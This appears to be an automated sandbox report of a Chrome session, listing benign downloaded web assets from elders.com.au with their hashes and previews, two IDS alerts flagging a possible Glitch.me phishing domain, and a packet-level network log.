                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8407_13472)">.<path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.8284 6.67157 22.5 7.5 22.5Z" fill="#2A2B2D"/>.<path d="M18 22.5C18.8284 22.5 19.5 21.8284 19.5 21C19.5 20.1716 18.8284 19.5 18 19.5C17.1716 19.5 16.5 20.1716 16.5 21C16.5 21.8284 17.1716 22.5 18 22.5Z" fill="#2A2B2D"/>.<path d="M21 5.24991H4.365L3.75 2.09991C3.71494 1.92795 3.62068 1.77374 3.48364 1.6641C3.3466 1.55447 3.17546 1.49637 3 1.49991H0V2.99991H2.385L5.25 17.3999C5.28506 17.5719 5.37932 17.7261 5.51636 17.8357C5.6534 17.9453 5.82454 18.0034 6 17.9999H19.5V16.4999H6.615L6 13.4999H19.5C19.6734 13.5041 19.8429 13.4482 19.9796 13.3415C20.1163 13.2348 20.2119 13.0841 20.25 12.9149L21.75 6.16491C21.7751 6.05363 21.7745 5.93808 21.7483 5.82706C21.722 5.71604 21.6708 5.61247 21.5985 5.52424C21.5261 5.436 21.4347 5.36543 21.3309 5.3179C21.227
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (3138)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3284
                                                                                                                                    Entropy (8bit):5.456630983929297
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:PY9+qw87WpFtuOXMfUFyJZAeNeMqOIDcgjHQ0jOpXSHVajXKCw1tngEo:P2+qJWpFtu4MvX0Mb0jOpXOCN
                                                                                                                                    MD5:BB4B6453E3AB80111A2B227318D22EFB
                                                                                                                                    SHA1:B65D59B9AA2B883EBDBE299E9CD40EA4CA642451
                                                                                                                                    SHA-256:9A54E6B1253D785972CCAAB75A888119D13083BFB1F80343AEF9454D5CD5BB6D
                                                                                                                                    SHA-512:FCC97D7E510C9AA9BCB23046271AB83CC0B6BF986B1B03E83E5D5A201FA7DB0B96DA8B54C9192A2D5AF2C5CDB0CA555AFE3A9CFE94F45E4EDF433D7AC203BC98
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.js`..function AppMeasurement_Module_ActivityMap(e){function t(){var e=s.pageYOffset+(s.innerHeight||0);e&&e>+f&&(f=e)}function n(){if(l.scrollReachSelector){var t=e.d.querySelector&&e.d.querySelector(l.scrollReachSelector);t?(f=t.scrollTop||0,t.addEventListener("scroll",(function(){var e;(e=t&&t.scrollTop+t.clientHeight||0)>f&&(f=e)}))):0<g--&&setTimeout(n,1e3)}}function r(e,t){var n,r,i;if(e&&t&&(n=l.c[t]||(l.c[t]=t.split(","))))for(i=0;i<n.length&&(r=n[i++]);)if(-1<e.indexOf(r))return null;return e}function i(t,n,r,i,a){var c,o;if((t.dataset&&(o=t.dataset[n])||t.getAttribute&&((o=t.getAttribute("data-"+r))||(o=t.getAttribute(r))))&&(c=o),!c&&e.useForcedLinkTracking&&a){var l;if(t=t.onclick?""+t.onclick:"",n="",i&&t&&0<=(r=t.indexOf(i))){for(r+=i.length;r<t.length;)if(o=t.charAt(r++),0<="'\"".indexOf(o)){l=o;break}for(var s=!1;r<t.length&&l&&(o=t
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2485)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25552
                                                                                                                                    Entropy (8bit):5.2834551676509225
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYSyQGr9O3e3Hbb18OAZx:RIT7sZwuvL54WAcl/F
                                                                                                                                    MD5:31333764D0399B68451DD96F402BA540
                                                                                                                                    SHA1:2B0F270EF474C27C8042165D52660918AD54D8FA
                                                                                                                                    SHA-256:32DF8CE52925289E6031567708F3D59E9A22FB9F073B81DBA810D5F29C501E73
                                                                                                                                    SHA-512:7E1C640E84CC75B50341C4C642EDABA9BC2EFE389330E8C38E87BDE0E7CC34D688A83D4802F82CA1B4753E03C1C85B90A66CA6A626186F96F55CD32F92B90F5D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):7278
                                                                                                                                    Entropy (8bit):7.955250971064799
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:78Qon1iBTWfFKJFhMFyLJxvQkNBjbUKTnFrKt43GkiHc4mDBSOPDaAxwGlnyQd4E:YsWiMFypNBM0ntKq2jEozgH0J+9S6hZ
                                                                                                                                    MD5:7D00F629EF06E4C02623BAB31806FF6C
                                                                                                                                    SHA1:4E70D5EFA7B9D28CF0D07BBD7D17C746933F6055
                                                                                                                                    SHA-256:553C5F482899857DA3DE9D2707A3A5F88777546BAE48B4534B801188420C9602
                                                                                                                                    SHA-512:8350FCEA21EA2C98CE8278DD3677890D9C4DC134BF03F397D2BDFC1231C8A2BA8CD464D5A20B5762FDECB9C460CC5B1E103C3398467B2BB9433406896278DE0E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR.............L\.....5IDATx...._U...>..{.._..H.*.. ..... ..).r@.@.UE)..... ....E.s.H.]b...*..C.C dN.K.^.....{....^.b:.....X..~..s.t..y.@G..........fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..m.~E?.............#.@..E@..x=. ....}E..U.W.@...).`T...0.T.l../..@$ ..bx...w....._...?~..@.......O.W..^-...`....6...."7...X.......:.._.<1#..=.~?...[G..0........:9`..i....L..*.. b...1D(!.t^.i/..s.^.E.,..B<.`.. .A.L.@....K ..d..G...;I..(.`E...vV..X..@Q-...)...8B.....n..p@${.....9.t....$....J.....E.i..^.K{5..P.{.."..7.n.<.KK..j...s@+...e]TO..TydT..n..L.~E..U.....IxwT.-!...z""...f...V=)...h.`e.o...w&.."..!....JH..z.Jsp.JvL.'....*Wk.h.D.S.N.vL+v..cK.j..I.e......(..<.)......$...FX~.TX...{Bu.q.H....-.$O9V..t....q./?..c.....]E3PQ.b.0..W....f%^D..V[..%.F...hT........@.E.B.F"..5E,.....N3..}.*Gq.U..*....e...~...P.4S\...\."."V..K..L..4A.d ...<DE\.5$..G..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (41034)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2127266
                                                                                                                                    Entropy (8bit):5.423974454035628
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:49152:D5hGMshdG4FZlZA1ehHIn0R2QMs9N5LpAORryGG4lQeUmOxkSyi7rO38dmYFqzFY:Bl
                                                                                                                                    MD5:3D0EB1CE53FB55BB5540E2CD4AABBACF
                                                                                                                                    SHA1:1192128760568CB569FC9A9463114DE6FBD2DF85
                                                                                                                                    SHA-256:53CD19A14D1E2B0413E84D6030E339E1F0D997622DC31B92E0A164A357ED227F
                                                                                                                                    SHA-512:6C84268726BA141B9A7865FE8847DAD152C60CD1ECB74D47EC688ED011E91ED214A0A8ED19B0A596898797A4AB12085CFF6C00871A8165D5A258C2A5F560513D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                    Preview:@charset "UTF-8";@keyframes react-loading-skeleton{to{transform:translateX(100%)}}.react-loading-skeleton{--base-color:#ebebeb;--highlight-color:#f5f5f5;--animation-duration:1.5s;--animation-direction:normal;--pseudo-element-display:block;background-color:var(--base-color);width:100%;border-radius:.25rem;display:inline-flex;line-height:1;position:relative;-webkit-user-select:none;-moz-user-select:none;user-select:none;overflow:hidden}.react-loading-skeleton:after{content:" ";display:var(--pseudo-element-display);position:absolute;top:0;left:0;right:0;height:100%;background-repeat:no-repeat;background-image:linear-gradient(90deg,var(--base-color),var(--highlight-color) 50%,var(--base-color));background-image:var(--custom-highlight-background,linear-gradient(90deg,var(--base-color),var(--highlight-color) 50%,var(--base-color)));transform:translateX(-100%);animation-name:react-loading-skeleton;animation-direction:var(--animation-direction);animation-duration:var(--animation-duration);anim
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):7278
                                                                                                                                    Entropy (8bit):7.955250971064799
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:78Qon1iBTWfFKJFhMFyLJxvQkNBjbUKTnFrKt43GkiHc4mDBSOPDaAxwGlnyQd4E:YsWiMFypNBM0ntKq2jEozgH0J+9S6hZ
                                                                                                                                    MD5:7D00F629EF06E4C02623BAB31806FF6C
                                                                                                                                    SHA1:4E70D5EFA7B9D28CF0D07BBD7D17C746933F6055
                                                                                                                                    SHA-256:553C5F482899857DA3DE9D2707A3A5F88777546BAE48B4534B801188420C9602
                                                                                                                                    SHA-512:8350FCEA21EA2C98CE8278DD3677890D9C4DC134BF03F397D2BDFC1231C8A2BA8CD464D5A20B5762FDECB9C460CC5B1E103C3398467B2BB9433406896278DE0E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://logo.clearbit.com/elders.com.au
                                                                                                                                    Preview:.PNG........IHDR.............L\.....5IDATx...._U...>..{.._..H.*.. ..... ..).r@.@.UE)..... ....E.s.H.]b...*..C.C dN.K.^.....{....^.b:.....X..~..s.t..y.@G..........fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..mV.@....fu..Y..m.~E?.............#.@..E@..x=. ....}E..U.W.@...).`T...0.T.l../..@$ ..bx...w....._...?~..@.......O.W..^-...`....6...."7...X.......:.._.<1#..=.~?...[G..0........:9`..i....L..*.. b...1D(!.t^.i/..s.^.E.,..B<.`.. .A.L.@....K ..d..G...;I..(.`E...vV..X..@Q-...)...8B.....n..p@${.....9.t....$....J.....E.i..^.K{5..P.{.."..7.n.<.KK..j...s@+...e]TO..TydT..n..L.~E..U.....IxwT.-!...z""...f...V=)...h.`e.o...w&.."..!....JH..z.Jsp.JvL.'....*Wk.h.D.S.N.vL+v..cK.j..I.e......(..<.)......$...FX~.TX...{Bu.q.H....-.$O9V..t....q./?..c.....]E3PQ.b.0..W....f%^D..V[..%.F...hT........@.E.B.F"..5E,.....N3..}.*Gq.U..*....e...~...P.4S\...\."."V..K..L..4A.d ...<DE\.5$..G..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):77484
                                                                                                                                    Entropy (8bit):5.318928790524135
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicPj:RIT7OXVs9ZVKBvYj8wKcHPj
                                                                                                                                    MD5:4D64F8D073A1B5E2261C9B8D29A6C8E6
                                                                                                                                    SHA1:16420D7CF18AE6B2C663FDA3B0479F74F195BB2C
                                                                                                                                    SHA-256:7F8EF66DA0E5D2211C847BFE7370A26A85FC23999E7DF4C60867103E0ABCB3E3
                                                                                                                                    SHA-512:C2001E576950F6347FD3F05959D88711046F0842DED60D06EB58D0140434447918DC4F331E3835C5D6C942F591F6FA24697968B1CBA02A7DE275A13C0F2564B4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (793)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):309403
                                                                                                                                    Entropy (8bit):5.08553909553394
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:qWP/hfR3+x226XfKuaKdrGDrDw4QZt7waFiP8GskIz8qDBp:qWPAw4QZt7waFiP8GskIz8qDb
                                                                                                                                    MD5:60038E123DF28EA326DA7B93DFC6BC75
                                                                                                                                    SHA1:480E89BDB8A61FCA7EDF4674B2682B8022ED89AB
                                                                                                                                    SHA-256:ABE71806906E6CC61DA6A1E8B41C1E16078E081C73F85A8C7A29DE65957D10BB
                                                                                                                                    SHA-512:B5568DA69E0B779979E09C840DA489FE8DACB27AC2A38A70AC22AE568D5F236EEC049CCE18599580094241F192665648A08D39A811B60C768340B8E70E017AFF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-head.lc-60038e123df28ea326da7b93dfc6bc75-lc.min.css
                                                                                                                                    Preview::root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg,rgba(255,255,255,0.15),rgba(255,255,255,0))}.*,*::before,*::after{box-sizing:border-box}.@media(prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}.}.body{margin:0;font-family:var(--bs-font-sans-serif);font-size:1rem;font-weight:400;li
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):484
                                                                                                                                    Entropy (8bit):7.273009315077355
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/DGh50phHoEkw3Anh550FU50gmK8E+4cIV0FdDy:x/6G8gWEkiE5yFTgT+BW0FdDy
                                                                                                                                    MD5:F41040006C5AC677120F5F6E53803F24
                                                                                                                                    SHA1:A360910A5BCDFD5840DFAA31F05E0E768A63125F
                                                                                                                                    SHA-256:E6EF3FB8A35B4F9B01BEB6EFFDC6CDBA1E5CE5A250C528341047F9884BC0611C
                                                                                                                                    SHA-512:AA20C46A3651139B30C1A8D15B058C87907C1B08CFACB0C3A769FF3D9190E59E65FE0A5BDEE8B21A357C71CBDBADD704B16825C33A01467FAF04BD2B12068F40
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/linkedin.png
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....yIDATx..KN.0..g.,X.!!...$.....z....d.#.......... a....T...*!.E}$..~R....o....]0.&...!.AR...._...vHY..5.f..2....~.4.....|*.K...v{....P.CA5x...jb$..U.m.....jb\Q..[...9@..jb-.d....`V.......t.Ld...2..K....wqq.).U..$J.$.z.8.l>?..",.%I.....".0.[..$*Q5x.(..u/U}.)..Ra3nM.. .4z....vQ'(.ck.....<_#..M"Q5wJ..._.kf.N..a.....}@.}..:.x.Y9i...h.4...4m.}E)...G.'.h.F.-.1..L^}.5..<...r....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65321)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):96614
                                                                                                                                    Entropy (8bit):4.750153610655337
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
                                                                                                                                    MD5:4CA760F49CD8A14911C81E6C14328874
                                                                                                                                    SHA1:81687E7A5DBBA470120798CF05DC31E8D57F0B11
                                                                                                                                    SHA-256:F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
                                                                                                                                    SHA-512:BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free.min.css?token=f6136e9b49
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (12736)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):13165
                                                                                                                                    Entropy (8bit):5.228581165291596
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:NO3pHufbPUCpEcrbCpg68vhtz91LO7sgBy70nZbPkks3ZXF1vh3rg1Q5l8hY6o3+:NdACfCghtzb0tnByHVh3s1Q5l8hY+
                                                                                                                                    MD5:BC71BE90D9E5F009FBF8C9548762DD7D
                                                                                                                                    SHA1:241A1C01275BF855638CA3545CF9BBF8C79B3830
                                                                                                                                    SHA-256:1C9EBE3AF7697D5F7EA4B94176CD512255E1F6F42B811DEBF4024DFA499CD16A
                                                                                                                                    SHA-512:9B9C2861B0913B5D698C8CDB57338272A7ABB8DFD797F30C1322845989E609E8FB96EF01E8F2545CB78F32EBC6091161B19180B5013FC4F01E2C5EEC11E1673E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://kit.fontawesome.com/f6136e9b49.js
                                                                                                                                    Preview:window.FontAwesomeKitConfig = {"id":30124676,"version":"6.6.0","token":"f6136e9b49","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":false},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":true},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":true}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(O
                                                                                                                                    No static file info
                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-11-05T09:02:15.148553+01002029493ET PHISHING Possible Glitch.me Phishing Domain1192.168.2.4543271.1.1.153UDP
                                                                                                                                    2024-11-05T09:02:15.148689+01002029493ET PHISHING Possible Glitch.me Phishing Domain1192.168.2.4494881.1.1.153UDP
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 5, 2024 09:02:03.259922981 CET49675443192.168.2.4173.222.162.32
                                                                                                                                    Nov 5, 2024 09:02:12.864351034 CET49675443192.168.2.4173.222.162.32
                                                                                                                                    Nov 5, 2024 09:02:15.166420937 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.166470051 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.166547060 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.166764975 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.166829109 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.166882992 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.167089939 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.167110920 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.167217016 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.167231083 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.992336988 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.992624998 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.992660046 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.993822098 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.993911028 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.994971991 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.995084047 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.995184898 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.995191097 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.997517109 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.997729063 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.997755051 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.998749971 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:15.998812914 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.999165058 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:15.999242067 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.042690039 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.042694092 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.042706966 CET4434973654.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.089378119 CET49736443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.377547979 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:16.377585888 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.377665997 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:16.377892971 CET49739443192.168.2.4142.250.186.164
                                                                                                                                    Nov 5, 2024 09:02:16.377908945 CET44349739142.250.186.164192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418337107 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418364048 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418370962 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418385029 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418418884 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418438911 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.418464899 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.418483019 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.418519974 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.535109043 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.535130978 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.535200119 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.535212994 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.535254955 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.536003113 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.536062956 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.536068916 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.590188980 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.826193094 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826211929 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826266050 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.826299906 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826917887 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826956034 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826971054 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.826976061 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826987982 CET4434973554.81.94.16192.168.2.4
                                                                                                                                    Nov 5, 2024 09:02:16.826999903 CET49735443192.168.2.454.81.94.16
                                                                                                                                    Nov 5, 2024 09:02:16.827003002 CET4434973554.81.94.16192.168.2.4
